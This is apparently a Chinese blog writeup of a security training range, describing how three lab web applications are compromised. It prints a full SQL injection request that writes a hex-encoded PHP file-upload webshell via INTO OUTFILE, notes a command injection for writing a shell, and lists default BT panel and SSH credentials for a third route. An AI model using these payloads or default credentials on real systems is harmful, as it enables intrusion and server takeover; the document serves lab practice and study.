正文

星悦安全仿真靶场-Writeup

admin
admin V管理员 /0 评论 /4 阅读
0807
文章最后更新时间2025年08月07日,若文章内容或图片失效,请留言反馈!

点击上方蓝字关注我们 并设为星标

0x00 前言

靶场地址: https://bc.xyusec.com/web/

一.国外学生管理系统

sql注入,直接into outfile写入,os-shell不能直接写入,稍微更改,让前面有数据即可写入shell

POST /admin/login.php HTTP/1.1Content-Length: 1574Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedCookie373453d1447163af75132029733f6866=95e99642-654e-4d2d-b0fa-5bd278a23784.QSh4qXNUXTtiZgS4Lla5aYNO01I; PHPSESSID=28cu7t8qo4gl8o6t0eum4iptbe; http_Path=%2Fwww%2Fwwwroot%2Fstudent-php%2FadminHost127.0.0.1Origin: http://127.0.0.1Referer: http://127.0.0.1/admin/login.phpUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Connection: closeusername=yescablessdwwewe%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Ftmpuyhyg.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20-&password=123456&login=

二.AI助记词

直接echo 写 shell即可,命令注入点在model那里,过滤的函数不多

三.多客圈子论坛社区

方法一 : 直接伪造JWT,然后前台上传文件Getshell

方法二 : SQL注入拿到后台账号密码,或者任意文件读取读取宝塔 access.log ,拿到phpmyadmin地址,然后直接改密码进后台上传文件Getshell

方法三(非预期打法):通过pma端口判断出是安装的宝塔Docker版,直接进宝塔面板获取服务器权限 (下面信息都是默认且固定的).
默认宝塔端口-安全面板 ip:38888/btpanel 
默认账号密码: btpanel | btpaneldocker
默认SSH密码: btpaneldocker

0x02 关注公众号

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,交易所

关注公众号,获取最新安全文章!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-宙飒天下网